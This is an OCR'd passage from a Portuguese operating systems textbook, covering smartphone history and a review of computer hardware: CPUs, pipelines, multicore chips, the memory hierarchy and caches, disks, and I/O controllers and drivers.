ardentemente um dispositivo de comunicação que elas 
pudessem levar para toda parte. O primeiro telefone 
móvel real apareceu em 1946 e pesava em torno de 40 
quilos. Você podia levá-lo para toda parte, desde que 
você tivesse um carro para carregá-lo. 

O primeiro telefone verdadeiramente móvel foi cria- 
do na década de 1970 e, pesando cerca de um quilo, 
era positivamente um peso-pena. Ele ficou conhecido 
carinhosamente como “o tijolo”. Logo todos queriam 
um. Hoje, a penetração do telefone móvel está próxima 
de 90% da população global. Podemos fazer chamadas 
não somente com nossos telefones portáteis e relógios 
de pulso, mas logo com óculos e outros itens que você 
pode vestir. Além disso, a parte do telefone não é mais 
tão importante. Recebemos e-mail, navegamos na web, 
enviamos mensagens para nossos amigos, jogamos, en- 
contramos o melhor caminho dirigindo — e não pensa- 
mos duas vezes a respeito disso. 
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Embora a ideia de combinar a telefonia e a computa- 
¢ao em um dispositivo semelhante a um telefone exista 
desde a década de 1970 também, o primeiro smartphone 
de verdade não foi inventado até meados de 1990, quan- 
do a Nokia lançou o N9000, que literalmente combina- 
va dois dispositivos mormente separados: um telefone 
e um PDA (Personal Digital Assistant — assistente 
digital pessoal). Em 1997, a Ericsson cunhou o termo 
smartphone para o seu “Penelope” GS88. 

Agora que os smartphones tornaram-se onipresen- 
tes, a competição entre os vários sistemas operacionais 
tornou-se feroz e o desfecho é mais incerto ainda que no 
mundo dos PCs. No momento em que escrevo este li- 
vro, o Android da Google é o sistema operacional domi- 
nante, com o iOS da Apple sozinho em segundo lugar, 
mas esse nem sempre foi o caso e tudo pode estar dife- 
rente de novo em apenas alguns anos. Se algo está claro 
no mundo dos smartphones é que não é fácil manter-se 
no topo por muito tempo. 

Afinal de contas, a maioria dos smartphones na 
primeira década após sua criação era executada em 
Symbian OS. Era o sistema operacional escolhi- 
do para as marcas populares como Samsung, Sony 
Ericsson, Motorola e especialmente Nokia. No entan- 
to, outros sistemas operacionais como o Blackberry 
OS da RIM (introduzido para smartphones em 2002) 
e o 10S da Apple (lançado para o primeiro iPhone 
em 2007) começaram a ganhar mercado do Symbian. 
Muitos esperavam que o RIM dominasse o mercado 
de negócios, enquanto o iOS seria o rei dos dispo- 
sitivos de consumo. A participação de mercado do 
Symbian desabou. Em 2011, a Nokia abandonou o 
Symbian e anunciou que se concentraria no Windows 
Phone como sua principal plataforma. Por algum 
tempo, a Apple e o RIM eram festejados por todos 
(embora não tão dominantes quanto o Symbian tinha 


sido), mas não levou muito tempo para o Android, um 
sistema operacional baseado no Linux lançado pelo 
Google em 2008, dominar os seus rivais. 

Para os fabricantes de telefone, o Android tinha a 
vantagem de ser um sistema aberto e disponível sob 
uma licença permissiva. Como resultado, podiam 
mexer nele e adaptá-lo a seu hardware com facili- 
dade. Ele também tem uma enorme comunidade de 
desenvolvedores escrevendo aplicativos, a maior par- 
te na popular linguagem de programação Java. Mes- 
mo assim, os últimos anos mostraram que o domínio 
talvez não dure, e os competidores do Android estão 
ansiosos para retomar parte da sua participação de 
mercado. Examinaremos o Android detalhadamente 
na Seção 10.8. 


1.3 Revisão sobre hardware de 
computadores 


Um sistema operacional está intimamente ligado ao 
hardware do computador no qual ele é executado. Ele 
estende o conjunto de instruções do computador e ge- 
rencia seus recursos. Para funcionar, ele deve conhecer 
profundamente o hardware, pelo menos como aparece 
para o programador. Por esta razão, vamos revisar bre- 
vemente o hardware de computadores como encontrado 
nos computadores pessoais modernos. Depois, pode- 
mos começar a entrar nos detalhes do que os sistemas 
operacionais fazem e como eles funcionam. 

Conceitualmente, um computador pessoal simples 
pode ser abstraído em um modelo que lembra a Figura 
1.6. A CPU, memória e dispositivos de E/S estão to- 
dos conectados por um sistema de barramento e comu- 
nicam-se uns com os outros sobre ele. Computadores 
pessoais modernos têm uma estrutura mais complicada, 
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envolvendo múltiplos barramentos, os quais examina- 
remos mais tarde. Por ora, este modelo será suficiente. 
Nas seções seguintes, revisaremos brevemente esses 
componentes e examinaremos algumas das questões 
de hardware que interessam aos projetistas de sistemas 
operacionais. Desnecessário dizer que este será um re- 
sumo bastante compacto. Muitos livros foram escritos 
sobre o tema hardware e organização de computadores. 
Dois títulos bem conhecidos foram escritos por Tanen- 
baum e Austin (2012) e Patterson e Hennessy (2013). 


1.3.1 Processadores 


O “cérebro” do computador é a CPU. Ela busca ins- 
truções da memória e as executa. O ciclo básico de toda 
CPU é buscar a primeira instrução da memória, decodi- 
ficá-la para determinar o seu tipo e operandos, executá- 
-la, e então buscar, decodificar e executar as instruções 
subsequentes. O ciclo é repetido até o programa termi- 
nar. É dessa maneira que os programas são executados. 

Cada CPU tem um conjunto específico de instruções 
que ela consegue executar. Desse modo, um processador 
x86 não pode executar programas ARM e um processa- 
dor ARM não consegue executar programas x86. Como o 
tempo para acessar a memória para buscar uma instrução 
ou palavra dos operandos é muito maior do que o tempo 
para executar uma instrução, todas as CPUs têm alguns 
registradores internos para armazenamento de variáveis 
e resultados temporários. Desse modo, o conjunto de 
instruções geralmente contém instruções para carregar 
uma palavra da memória para um registrador e armaze- 
nar uma palavra de um registrador para a memória. Ou- 
tras instruções combinam dois operandos provenientes 
de registradores, da memória, ou ambos, para produzir 
um resultado como adicionar duas palavras e armazenar 
o resultado em um registrador ou na memória. 

Além dos registradores gerais usados para armazenar 
variáveis e resultados temporários, a maioria dos com- 
putadores tem vários registradores especiais que são vi- 
síveis para o programador. Um desses é o contador de 
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programa, que contém o endereço de memória da próxi- 
ma instrução a ser buscada. Após essa instrução ter sido 
buscada, o contador de programa é atualizado para apon- 
tar a próxima instrução. 

Outro registrador é o ponteiro de pilha, que aponta 
para o topo da pilha atual na memória. A pilha contém 
uma estrutura para cada rotina que foi chamada, mas 
ainda não encerrada. Uma estrutura de pilha de rotina 
armazena aqueles parâmetros de entrada, variáveis lo- 
cais e variáveis temporárias que não são mantidas em 
registradores. 

Outro registrador ainda é o PSW (Program Status 
Word — palavra de estado do programa). Esse regis- 
trador contém os bits do código de condições, que são 
estabelecidos por instruções de comparação, a priori- 
dade da CPU, o modo de execução (usuário ou núcleo) 
e vários outros bits de controle. Programas de usuários 
normalmente podem ler todo o PSW, mas em geral po- 
dem escrever somente parte dos seus campos. O PSW 
tem um papel importante nas chamadas de sistema e 
em E/S. 

O sistema operacional deve estar absolutamente 
ciente de todos os registros. Quando realizando a mul- 
tiplexação de tempo da CPU, ele muitas vezes vai in- 
terromper o programa em execução para (recomeçar 
outro. Toda vez que ele para um programa em execução, 
o sistema operacional tem de salvar todos os registrado- 
res de maneira que eles possam ser restaurados quando 
o programa for executado mais tarde. 

Para melhorar o desempenho, os projetistas de CPU 
há muito tempo abandonaram o modelo simples de bus- 
car, decodificar e executar uma instrução de cada vez. 
Muitas CPUs modernas têm recursos para executar 
mais de uma instrução ao mesmo tempo. Por exemplo, 
uma CPU pode ter unidades de busca, decodificação e 
execução separadas, assim enquanto ela está executan- 
do a instrução n, poderia também estar decodificando 
a instrução n + 1 e buscando a instrução n + 2. Uma 
organização com essas características é chamada de pi- 
peline e é ilustrada na Figura 1.7(a) para um pipeline 


KeS (a) Um pipeline com três estágios. (b) Uma CPU superescalar. 










(a) 


Unid. 
execução 


Unid. 
execução 


Unid. 
execução 


Unid. 


decodificação 





16 | | SISTEMAS OPERACIONAIS MODERNOS 


com três estágios. Pipelines mais longos são comuns. 
Na maioria desses projetos, uma vez que a instrução te- 
nha sido levada para o pipeline, ela deve ser executada, 
mesmo que a instrução anterior tenha sido um desvio 
condicional tomado. Pipelines provocam grandes dores 
de cabeça nos projetistas de compiladores e de sistemas 
operacionais, pois expõem as complexidades da máqui- 
na subjacente e eles têm de lidar com elas. 

Ainda mais avançada que um projeto de pipeline 
é uma CPU superescalar, mostrada na Figura 1.7(b). 
Nesse projeto, unidades múltiplas de execução estão 
presentes. Uma unidade para aritmética de números 
inteiros, por exemplo, uma unidade para aritmética de 
ponto flutuante e uma para operações booleanas. Duas 
ou mais instruções são buscadas ao mesmo tempo, de- 
codificadas e jogadas em um buffer de instrução até que 
possam ser executadas. Tão logo uma unidade de exe- 
cução fica disponível, ela procura no buffer de instrução 
para ver se há uma instrução que ela pode executar e, se 
assim for, ela remove a instrução do buffer e a executa. 
Uma implicação desse projeto é que as instruções do 
programa são muitas vezes executadas fora de ordem. 
Em geral, cabe ao hardware certificar-se de que o resul- 
tado produzido é o mesmo que uma implementação se- 
quencial conseguiria, mas como veremos adiante, uma 
quantidade incômoda de tarefas complexas é empurrada 
para o sistema operacional. 

A maioria das CPUs — exceto aquelas muito sim- 
ples usadas em sistemas embarcados, tem dois modos, 
núcleo e usuário, como mencionado anteriormente. Em 
geral, um bit no PSW controla o modo. Quando ope- 
rando em modo núcleo, a CPU pode executar todas as 
instruções em seu conjunto de instruções e usar todos os 
recursos do hardware. Em computadores de mesa e ser- 
vidores, o sistema operacional normalmente opera em 
modo núcleo, dando a ele acesso a todo o hardware. Na 
maioria dos sistemas embarcados, uma parte pequena 
opera em modo núcleo, com o resto do sistema opera- 
cional operando em modo usuário. 

Programas de usuários sempre são executados em 
modo usuário, o que permite que apenas um subconjunto 
das instruções possa ser executado e um subconjun- 
to dos recursos possa ser acessado. Geralmente, todas 
as instruções envolvendo E/S e proteção de memória 
são inacessíveis no modo usuário. Alterar o bit de modo 
PSW para modo núcleo também é proibido, claro. 

Para obter serviços do sistema operacional, um pro- 
grama de usuário deve fazer uma chamada de siste- 
ma, que, por meio de uma instrução TRAP, chaveia 
do modo usuário para o modo núcleo e passa o con- 
trole para o sistema operacional. Quando o trabalho é 


finalizado, o controle retorna para o programa do usu- 
ário na instrução posterior à chamada de sistema. Ex- 
plicaremos os detalhes do mecanismo de chamada de 
sistema posteriormente neste capítulo. Por ora, pense 
nele como um tipo especial de procedimento de ins- 
trução de chamada que tem a propriedade adicional de 
chavear do modo usuário para o modo núcleo. Como 
nota a respeito da tipografia, usaremos a fonte Helvética 
com letras minúsculas para indicar chamadas de siste- 
ma ao longo do texto, como: read. 

Vale a pena observar que os computadores têm outras 
armadilhas (“traps”) além da instrução para executar 
uma chamada de sistema. A maioria das outras arma- 
dilhas é causada pelo hardware para advertir sobre uma 
situação excepcional como uma tentativa de divisão por 
0 ou um underflow (incapacidade de representação de 
um número muito pequeno) em ponto flutuante. Em to- 
dos os casos o sistema operacional assume o controle e 
tem de decidir o que fazer. Às vezes, o programa precisa 
ser encerrado por um erro. Outras vezes, o erro pode ser 
ignorado (a um número com underflow pode-se atribuir 
o valor 0). Por fim, quando o programa anunciou com 
antecedência que ele quer lidar com determinados tipos 
de condições, o controle pode ser passado de volta ao 
programa para deixá-lo cuidar do problema. 


Chips multithread e multinucleo 


A lei de Moore afirma que o número de transistores 
em um chip dobra a cada 18 meses. Tal “lei” não é ne- 
nhum tipo de lei da física, como a conservação do mo- 
mento, mas é uma observação do cofundador da Intel, 
Gordon Moore, de quão rápido os engenheiros de pro- 
cesso nas empresas de semicondutores são capazes de 
reduzir o tamanho dos seus transistores. A lei de Moore 
se mantém ha mais de três décadas até agora e espera-se 
que se mantenha por pelo menos mais uma. Após isso, 
o número de átomos por transistor tornar-se-á pequeno 
demais e a mecânica quântica começará a ter um papel 
maior, evitando uma redução ainda maior dos tamanhos 
dos transistores. 

A abundância de transistores está levando a um pro- 
blema: o que fazer com todos eles? Vimos uma aborda- 
gem acima: arquiteturas superescalares, com múltiplas 
unidades funcionais. Mas à medida que o número de 
transistores aumenta, mais ainda é possível. Algo óbvio 
a ser feito é colocar memórias cache maiores no chip da 
CPU. Isso de fato está acontecendo, mas finalmente o 
ponto de ganhos decrescentes será alcançado. 

O próximo passo óbvio é replicar não apenas as unida- 
des funcionais, mas também parte da lógica de controle. 


O Pentium 4 da Intel introduziu essa propriedade, cha- 
mada multithreading ou hyperthreading (o nome da 
Intel para ela), ao processador x86 e vários outros chips 
de CPU também o têm — incluindo o SPARC, o Powers, 
o Intel Xeon e a família Intel Core. Para uma primeira 
aproximação, o que ela faz é permitir que a CPU man- 
tenha o estado de dois threads diferentes e então faça o 
chaveamento entre um e outro em uma escala de tem- 
po de nanossegundos. (Um thread é um tipo de processo 
leve, o qual, por sua vez, é um programa de execução; 
entraremos nos detalhes no Capítulo 2.) Por exemplo, se 
um dos processos precisa ler uma palavra da memória (o 
que leva muitos ciclos de relógio), uma CPU multithread 
pode simplesmente fazer o chaveamento para outro thread. 
O multithreading não proporciona paralelismo real. Ape- 
nas um processo de cada vez é executado, mas o tempo 
de chaveamento de thread é reduzido para a ordem de um 
nanossegundo. 

O multithreading tem implicações para o sistema 
operacional, pois cada thread aparece para o sistema 
operacional como uma CPU em separado. Considere 
um sistema com duas CPUs efetivas, cada uma com 
dois threads. O sistema operacional verá isso como qua- 
tro CPUs. Se há apenas trabalho suficiente para manter 
duas CPUs ocupadas em um determinado momento no 
tempo, ele pode escalonar inadvertidamente dois threads 
para a mesma CPU, com a outra completamente ociosa. 
Essa escolha é muito menos eficiente do que usar um 
thread para cada CPU. 

Além do multithreading, muitos chips de CPU têm 
agora quatro, oito ou mais processadores completos ou 
núcleos neles. Os chips multinucleo da Figura 1.8 efe- 
tivamente trazem quatro minichips, cada um com sua 
CPU independente. (As caches serão explicadas a se- 
guir.) Alguns processadores, como o Intel Xeon Phi e o 
Tilera TilePro, já apresentam mais de 60 núcleos em um 
único chip. Fazer uso de um chip com múltiplos núcleos 
como esse definitivamente exigirá um sistema opera- 
cional de multiprocessador. 

Incidentalmente, em termos de números absolutos, 
nada bate uma GPU (Graphics Processing Unit — 
unidade de processamento gráfico) moderna. Uma GPU 
é um processador com, literalmente, milhares de núcleos 
minúsculos. Eles são muito bons para realizar muitos 
pequenos cálculos feitos em paralelo, como reproduzir 
polígonos em aplicações gráficas. Não são tão bons em 
tarefas em série. Eles também são difíceis de progra- 
mar. Embora GPUs possam ser úteis para sistemas ope- 
racionais (por exemplo, codificação ou processamento 
de tráfego de rede), não é provável que grande parte do 
sistema operacional em si vá ser executada nas GPUs. 
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aeii: TEE: (a) Chip quad-core com uma cache L2 compartilhada. 
(b) Um chip quad-core com caches L2 separadas. 
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1.3.2 Memória 


O segundo principal componente em qualquer com- 
putador é a memória. Idealmente, uma memória deve 
ser rápida ao extremo (mais rápida do que executar uma 
instrução, de maneira que a CPU não seja atrasada pela 
memória), abundantemente grande e muito barata. Ne- 
nhuma tecnologia atual satisfaz todas essas metas, as- 
sim uma abordagem diferente é tomada. O sistema de 
memória é construido como uma hierarquia de cama- 
das, como mostrado na Figura 1.9. As camadas supe- 
riores têm uma velocidade mais alta, capacidade menor 
e um custo maior por bit do que as inferiores, muitas 
vezes por fatores de um bilhão ou mais. 

A camada superior consiste em registradores inter- 
nos à CPU. Eles são feitos do mesmo material que a 
CPU e são, desse modo, tão rápidos quanto ela. Em 
consequência, não há um atraso ao acessá-los. A capaci- 
dade de armazenamento disponível neles é tipicamente 
32 x 32 bits em uma CPU de 32 bits e 64 x 64 bits 
em uma CPU de 64 bits. Menos de 1 KB em ambos os 
casos. Os programas devem gerenciar os próprios regis- 
tradores (isto é, decidir o que manter neles) no software. 

Em seguida, vem a memória cache, que é controlada 
principalmente pelo hardware. A memória principal é 
dividida em linhas de cache, tipicamente 64 bytes, com 
endereços 0 a 63 na linha de cache 0, 64 a 127 na linha 
de cache 1 e assim por diante. As linhas de cache mais 


(cj Uma hierarquia de memória típica. Os números são 
apenas aproximações. 
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utilizadas são mantidas em uma cache de alta velo- 
cidade localizada dentro ou muito próximo da CPU. 
Quando o programa precisa ler uma palavra de memó- 
ria, o hardware de cache confere se a linha requisitada 
está na cache. Se ela estiver presente na cache (cache 
hit), a requisição é atendida e nenhuma requisição de 
memória é feita para a memória principal sobre o bar- 
ramento. Cache hits costumam levar em torno de dois 
ciclos de CPU. Se a linha requisitada estiver ausente da 
cache (cache miss), uma requisição adicional é feita à 
memória, com uma penalidade de tempo substancial. A 
memória da cache é limitada em tamanho por causa do 
alto custo. Algumas máquinas têm dois ou três níveis de 
cache, cada um mais lento e maior do que o antecedente. 

O conceito de caching exerce um papel importante 
em muitas áreas da ciência de computadores, não ape- 
nas na colocação de linhas de RAM na cache. Sempre 
que um recurso pode ser dividido em partes, algumas 
das quais são usadas com muito mais frequência que as 
outras, o caching é muitas vezes utilizado para melhorar 
o desempenho. Sistemas operacionais o utilizam segui- 
damente. Por exemplo, a maioria dos sistemas opera- 
cionais mantém (partes de) arquivos muito usados na 
memória principal para evitar ter de buscá-los do disco 
de modo repetido. Similarmente, os resultados da con- 
versão de nomes de rota longa como 


/home/ast/projects/minix3/src/kernel/clock.c 


no endereço de disco onde o arquivo está localizado po- 
dem ser registrados em cache para evitar buscas repeti- 
das. Por fim, quando o endereço de uma página da web 
(URL) é convertido em um endereço de rede (endereço 
IP), o resultado pode ser armazenado em cache para uso 
futuro. Há muitos outros usos. 

Em qualquer sistema de cache, muitas perguntas sur- 
gem relativamente rápido, incluindo: 


1. Quando colocar um novo item na cache. 

2. Em qual linha de cache colocar o novo item. 

3. Qual item remover da cache quando for preciso 
espaço. 

4. Onde colocar um item recentemente desalojado 
na memória maior. 


Nem toda pergunta é relevante para toda situação de 
cache. Para linhas de cache da memória principal na ca- 
che da CPU, um novo item geralmente será inserido em 
cada ausência de cache. A linha de cache a ser usada em 
geral é calculada usando alguns dos bits de alta ordem 
do endereço de memória mencionado. Por exemplo, 
com 4.096 linhas de cache de 64 bytes e endereços de 
32 bits, os bits 6 a 17 podem ser usados para especificar 
a linha de cache, com os bits de O a 5 especificando 


os bytes dentro da linha de cache. Aqui, o item a ser 
removido é o mesmo de onde os novos dados são inse- 
ridos, mas em outros sistemas este pode não ser o caso. 
Por fim, quando uma linha de cache é reescrita para a 
memória principal (se ela tiver sido modificada desde 
que foi colocada na cache), o lugar na memória para 
reescrevê-la é determinado unicamente pelo endereço 
em questão. 

Caches são uma ideia tão boa que as CPUs moder- 
nas têm duas delas. O primeiro nível, ou cache L1, está 
sempre dentro da CPU e normalmente alimenta instru- 
ções decodificadas no mecanismo de execução da CPU. 
A maioria dos chips tem uma segunda cache L1 para 
palavras de dados usadas com muita intensidade. As 
caches L1 são em geral de 16 KB cada. Além disso, 
há muitas vezes uma segunda cache, chamada de cache 
L2, que armazena vários megabytes de palavras de me- 
mória recentemente usadas. A diferença entre as caches 
L1 e L2 encontra-se na sincronização. O acesso à cache 
L1 é feito sem atraso algum, enquanto o acesso à cache 
L2 envolve um atraso de um ou dois ciclos de relógio. 

Em chips de multinúcleo, os projetistas têm de deci- 
dir onde colocar as caches. Na Figura 1.8(a), uma única 
cache L2 é compartilhada por todos os núcleos. Essa 
abordagem é usada em chips de multinúcleo da Intel. 
Em comparação, na Figura 1.8(b), cada núcleo tem sua 
própria cache L2. Essa abordagem é usada pela AMD. 
Cada estratégia tem seus prós e contras. Por exemplo, a 
cache L2 compartilhada da Intel exige um controlador 
de cache mais complicado, mas o método AMD torna 
mais difícil manter a consistência entre as caches L2. 

A memória principal vem a seguir na hierarquia da 
Figura 1.9. Trata-se da locomotiva do sistema de me- 
mória. A memória principal é normalmente chamada de 
RAM (Random Access Memory — memória de aces- 
so aleatório). Os mais antigos às vezes a chamam de 
memória de núcleo (core memory), pois os computa- 
dores nas décadas de 1950 e 1960 usavam minúsculos 
núcleos de ferrite magnetizáveis como memória princi- 
pal. Hoje, as memórias têm centenas de megabytes a vá- 
rios gigabytes e vêm crescendo rapidamente. Todas as 
requisições da CPU que não podem ser atendidas pela 
cache vão para a memória principal. 

Além da memória principal, muitos computadores 
têm uma pequena memória de acesso aleatório não vo- 
látil. Diferentemente da RAM, a memória não volátil 
não perde o seu conteúdo quando a energia é desligada. 
A ROM (Read Only Memory — memória somente de 
leitura) é programada na fábrica e não pode ser modi- 
ficada depois. Ela é rápida e barata. Em alguns com- 
putadores, o carregador (bootstrap loader) usado para 


inicializar o computador está contido na ROM. Tam- 
bém algumas placas de E/S vêm com a ROM para lidar 
com o controle de dispositivos de baixo nível. 

A EEPROM (Electrically Erasable PROM — 
ROM eletricamente apagável) e a memória flash tam- 
bém são não voláteis, mas, diferentemente da ROM, 
podem ser apagadas e reescritas. No entanto, escrevê- 
-las leva muito mais tempo do que escrever em RAM, 
então elas são usadas da mesma maneira que a ROM, 
apenas com a característica adicional de que é possível 
agora corrigir erros nos programas que elas armazenam 
mediante sua regravação. 

A memória flash também é bastante usada como um 
meio de armazenamento em dispositivos eletrônicos 
portáteis. Ela serve como um filme em câmeras digitais 
e como disco em reprodutores de música portáteis, ape- 
nas como exemplo. A memória flash é intermediária em 
velocidade entre a RAM e o disco. Também, diferen- 
temente da memória de disco, ela se desgasta quando 
apagada muitas vezes. 

Outro tipo ainda de memória é a CMOS, que é vo- 
látil. Muitos computadores usam a memória CMOS 
para armazenar a hora e a data atualizadas. A memória 
CMOS e o circuito de relógio que incrementa o tem- 
po registrado nela são alimentados por uma bateria pe- 
quena, então a hora é atualizada corretamente, mesmo 
quando o computador estiver desligado. A memória 
CMOS também pode conter os parâmetros de configu- 
ração, como de qual disco deve se carregar o sistema. 
A CMOS é usada porque consome tão pouca energia 
que a bateria original instalada na fábrica muitas vezes 
dura por vários anos. No entanto, quando ela começa a 
falhar, o computador pode parecer ter a doença de Al- 
zheimer, esquecendo coisas que ele sabia há anos, como 
de qual disco rígido carregar o sistema operacional. 


1.3.3 Discos 


Em seguida na hierarquia está o disco magnético 
(disco rígido). O armazenamento de disco é duas ordens 
de magnitude mais barato, por bit, que o da RAM e fre- 
quentemente duas ordens de magnitude maior também. 
O único problema é que o tempo para acessar aleatoria- 
mente os dados é próximo de três ordens de magnitude 
mais lento. Isso ocorre porque o disco é um dispositivo 
mecânico, como mostrado na Figura 1.10. 

Um disco consiste em um ou mais pratos metáli- 
cos que rodam a 5.400, 7.200, 10.800 RPM, ou mais. 
Um braço mecânico move-se sobre esses pratos a par- 
tir da lateral, como o braço de toca-discos de um ve- 
lho fonógrafo de 33 RPM para tocar discos de vinil. A 
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[FIGURA 1.10 | Estrutura de uma unidade de disco. 
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informação é escrita no disco em uma série de círculos 
concêntricos. Em qualquer posição do braço, cada uma 
das cabeças pode ler uma região circular chamada de 
trilha. Juntas, todas as trilhas de uma dada posição do 
braço formam um cilindro. 

Cada trilha é dividida em um determinado número de 
setores, com tipicamente 512 bytes por setor. Em discos 
modernos, os cilindros externos contêm mais setores do 
que os internos. Mover o braço de um cilindro para o 
próximo leva em torno de 1 ms. Movê-lo para um cilin- 
dro aleatório costuma levar de 5 a 10 ms, dependendo 
do dispositivo acionador. Uma vez que o braço esteja 
na trilha correta, o dispositivo acionador tem de esperar 
até que o setor desejado gire sob a cabeça, um atraso 
adicional de 5 a 10 ms, dependendo da RPM do dispo- 
sitivo acionador. Assim que o setor estiver sob a cabeça, 
a leitura ou escrita ocorre a uma taxa de 50 MB/s em 
discos de baixo desempenho até 160 MB/s em discos 
mais rápidos. 

Às vezes você ouvirá as pessoas falando sobre discos 
que não são discos de maneira alguma, como os SSDs 
(Solid State Disks — discos em estado sólido). SSDs 
não têm partes móveis, não contêm placas na forma de 
discos e armazenam dados na memória (flash). A única 
maneira pela qual lembram discos é que eles também 
armazenam uma quantidade grande de dados que não é 
perdida quando a energia é desligada. 

Muitos computadores dão suporte a um esquema 
conhecido como memória virtual, que discutiremos 
de maneira mais aprofundada no Capítulo 3. Esse es- 
quema torna possível executar programas maiores que 
a memória física colocando-os no disco e usando a me- 
mória principal como um tipo de cache para as partes 
mais intensivamente executadas. Esse esquema exige o 
remapeamento dos endereços de memória rapidamente 
para converter o endereço que o programa gerou para 
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o endereço físico em RAM onde a palavra está locali- 
zada. Esse mapeamento é feito por uma parte da CPU 
chamada MMU (Memory Management Unit — uni- 
dade de gerenciamento de memória), como mostrado 
na Figura 1.6. 

A presença da cache e da MMU pode ter um impac- 
to importante sobre o desempenho. Em um sistema de 
multiprogramação, quando há o chaveamento de um 
programa para outro, às vezes chamado de um chave- 
amento de contexto, pode ser necessário limpar todos 
os blocos modificados da cache e mudar os registros 
de mapeamento na MMU. Ambas são operações caras, 
e os programadores fazem o que podem para evitá-las. 
Veremos algumas das implicações de suas táticas mais 
tarde. 


1.3.4 Dispositivos de E/S 


A CPU e a memória não são os únicos recursos que 
o sistema operacional tem de gerenciar. Dispositivos 
de E/S também interagem intensamente com o sistema 
operacional. Como vimos na Figura 1.6, dispositivos de 
E/S consistem em geral em duas partes: um controlador 
e o dispositivo em si. O controlador é um chip ou um 
conjunto de chips que controla fisicamente o disposi- 
tivo. Ele aceita comandos do sistema operacional, por 
exemplo, para ler dados do dispositivo, e os executa. 

Em muitos casos, o controle real do dispositivo é 
complicado e detalhado, então faz parte do trabalho do 
controlador apresentar uma interface mais simples (mas 
mesmo assim muito complexa) para o sistema operacio- 
nal. Por exemplo, um controlador de disco pode aceitar 
um comando para ler o setor 11.206 do disco 2. O con- 
trolador tem então de converter esse número do setor 
linear para um cilindro, setor e cabeça. Essa conver- 
são pode ser complicada porque os cilindros exteriores 
têm mais setores do que os interiores, e alguns setores 
danificados foram remapeados para outros. Então o 
controlador tem de determinar em qual cilindro está o 
braço do disco e dar a ele um comando correspondente 
à distância em número de cilindros. Ele deve aguardar 
até que o setor apropriado tenha girado sob a cabeça 
e então começar a ler e a armazenar os bits à medida 
que eles saem do acionador, removendo o cabeçalho e 
conferindo a soma de verificação (checksum). Por fim, 
ele tem de montar os bits que chegam em palavras e ar- 
mazená-las na memória. Para fazer todo esse trabalho, 
os controladores muitas vezes contêm pequenos com- 
putadores embutidos que são programados para realizar 
o seu trabalho. 


A outra parte é o dispositivo real em si. Os dispo- 
sitivos possuem interfaces relativamente simples, tanto 
porque eles não podem fazer muito, como para padro- 
nizá-los. A padronização é necessária para que qualquer 
controlador de disco SATA possa controlar qualquer dis- 
co SATA, por exemplo. SATA é a sigla para Serial ATA, 
e ATA por sua vez é a sigla para AT Attachment. Caso 
você esteja curioso para saber o significado de AT, esta 
foi a segunda geração da “Personal Computer Advan- 
ced Technology” (tecnologia avançada de computadores 
pessoais) da IBM, produzida em torno do então extrema- 
mente potente processador 80286 de 6 MHz que a em- 
presa introduziu em 1984. O que aprendemos disso é que 
a indústria de computadores tem o hábito de incrementar 
continuamente os acrônimos existentes com novos pre- 
fixos e sufixos. Também aprendemos que um adjetivo 
como “avançado” deve ser usado com grande cuidado, 
ou você passará ridículo daqui a trinta anos. 

O SATA é atualmente o tipo de disco padrão em mui- 
tos computadores. Dado que a interface do dispositivo 
real está escondida atrás do controlador, tudo o que o 
sistema operacional vê é a interface para o controlador, 
o que pode ser bastante diferente da interface para o 
dispositivo. 

Como cada tipo de controlador é diferente, diversos 
softwares são necessários para controlar cada um. O 
software que conversa com um controlador, dando a ele 
comandos e aceitando respostas, é chamado de driver 
de dispositivo. Cada fabricante de controladores tem de 
fornecer um driver para cada sistema operacional a que 
dá suporte. Assim, um digitalizador de imagens pode 
vir com drivers para OS X, Windows 7, Windows 8 e 
Linux, por exemplo. 

Para ser usado, o driver tem de ser colocado den- 
tro do sistema operacional de maneira que ele possa 
ser executado em modo núcleo. Na realidade, drivers 
podem ser executados fora do núcleo, e sistemas opera- 
cionais como Linux e Windows hoje em dia oferecem 
algum suporte para isso. A vasta maioria dos drivers 
ainda opera abaixo do nivel do nucleo. Apenas muito 
poucos sistemas atuais, como o MINIX 3, operam todos 
os drivers em espaço do usuário. Drivers no espaço do 
usuário precisam ter permissão de acesso ao dispositivo 
de uma maneira controlada, o que não é algo trivial. 

Há três maneiras pelas quais o driver pode ser coloca- 
do no núcleo. A primeira é religar o núcleo com o novo 
driver e então reinicializar o sistema. Muitos sistemas 
UNIX mais antigos funcionam assim. A segunda manei- 
ra é adicionar uma entrada em um arquivo do sistema 
operacional dizendo-lhe que ele precisa do driver e então 
reinicializar o sistema. No momento da inicialização, o 


sistema operacional vai e encontra os drivers que ele pre- 
cisa e os carrega. O Windows funciona dessa maneira. 
A terceira maneira é capacitar o sistema operacional a 
aceitar novos drivers enquanto estiver sendo executado 
e instalá-los rapidamente sem a necessidade da reinicia- 
lização. Essa maneira costumava ser rara, mas está se 
tornando muito mais comum hoje. Dispositivos do tipo 
hot-pluggable (acoplados a quente), como dispositivos 
USB e IEEE 1394 (discutidos a seguir), sempre precisam 
de drivers carregados dinamicamente. 

Todo controlador tem um pequeno número de regis- 
tradores que são usados para comunicar-se com ele. Por 
exemplo, um controlador de discos mínimo pode ter re- 
gistradores para especificar o endereço de disco, ende- 
reço de memória, contador de setores e direção (leitura 
ou escrita). Para ativar o controlador, o driver recebe um 
comando do sistema operacional, então o traduz para os 
valores apropriados a serem escritos nos registradores 
dos dispositivos. A reunião de todos esses registradores 
de dispositivos forma o espaço de portas de E/S, um 
assunto que retomaremos no Capítulo 5. 

Em alguns computadores, os registradores dos dispo- 
sitivos estão mapeados no espaço do endereço do sistema 
operacional (os endereços que ele pode usar), portanto 
podem ser lidos e escritos como palavras de memória co- 
muns. Nesses computadores, não são necessárias instru- 
ções de E/S especiais e os programas de usuários podem 
ser mantidos distantes do hardware deixando esses ende- 
reços de memória fora de seu alcance (por exemplo, pelo 
uso de registradores-base e limite). Em outros compu- 
tadores, os registradores dos dispositivos são colocados 
em um espaço de porta E/S especial, com cada registra- 
dor tendo um endereço de porta. Nessas máquinas, ins- 
truções especiais IN e OUT estão disponíveis em modo 
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núcleo para permitir que os drivers leiam e escrevam nos 
registradores. O primeiro esquema elimina a necessida- 
de para instruções de E/S especiais, mas consome parte 
do espaço do endereço. O segundo esquema não utiliza 
espaço do endereço, mas exige instruções especiais. Am- 
bos os sistemas são amplamente usados. 

A entrada e a saída podem ser realizadas de três ma- 
neiras diferentes. No método mais simples, um progra- 
ma de usuário emite uma chamada de sistema, que o 
núcleo traduz em uma chamada de rotina para o driver 
apropriado. O driver então inicia a E/S e aguarda usando 
